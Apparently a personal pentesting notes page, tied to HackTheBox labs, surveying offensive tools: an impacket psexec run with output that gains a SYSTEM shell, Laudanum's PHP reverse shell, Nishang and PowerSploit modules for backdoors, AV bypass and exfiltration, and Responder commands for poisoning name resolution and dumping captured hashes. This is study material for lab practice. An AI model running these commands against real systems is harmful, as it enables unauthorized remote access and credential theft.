Misc Tools Misc Pentesting Tools

February 23, 2021 at 12:46 AM Edit on GitHub

Misc Pentesting Tools

Table of Contents

tags: Security Tools

collection

Misc

impacket

Impacket is a collection of Python classes for working with network protocols.

impacket-psexec

Get system shell

python3 psexec.py Administrator@bastion.htb 
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on bastion.htb.....
[*] Found writable share ADMIN$
[*] Uploading file hoQpxzMA.exe
[*] Opening SVCManager on bastion.htb.....
[*] Creating service qdbo on bastion.htb.....
[*] Starting service qdbo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

seclists

List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more

/usr/share/seclists
Discovery  IOCs           Passwords         Payloads   Usernames
Fuzzing    Miscellaneous  Pattern-Matching  README.md  Web-Shells

Laudanum

Laudanum is a collection of injectable files

/usr/share/laudanum
asp  aspx  cfm  helpers  jsp  php  README  wordpress
  • php - reverse shell /usr/share/laudanum/php/php-reverse-shell.php

Microsoft

nishang

Offensive PowerShell for red team, penetration testing and offensive security. GitHub

/usr/share/nishang/
ActiveDirectory  Bypass      Execution  MITM          powerpreter  Shells
Antak-WebShell   Client      Gather     nishang.psm1  Prasadhak    Utility
Backdoors        Escalation  Misc       Pivot         Scan

PowerSploit

PowerSploit - A PowerShell Post-Exploitation Framework

/usr/share/windows-resources/powersploit * this version is too old
AntivirusBypass  Mayhem            PowerSploit.psm1  Recon
CodeExecution    Persistence       Privesc           ScriptModification
Exfiltration     PowerSploit.psd1  README.md         Tests

Others

Responder/MultiRelay

GitHub - lgandx Responder an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409).

responder -I tun0

Get Full hashes in Responder

locate Responder.db
sqlite3 /usr/share/responder/Responder.db
sqlite> select * from responder;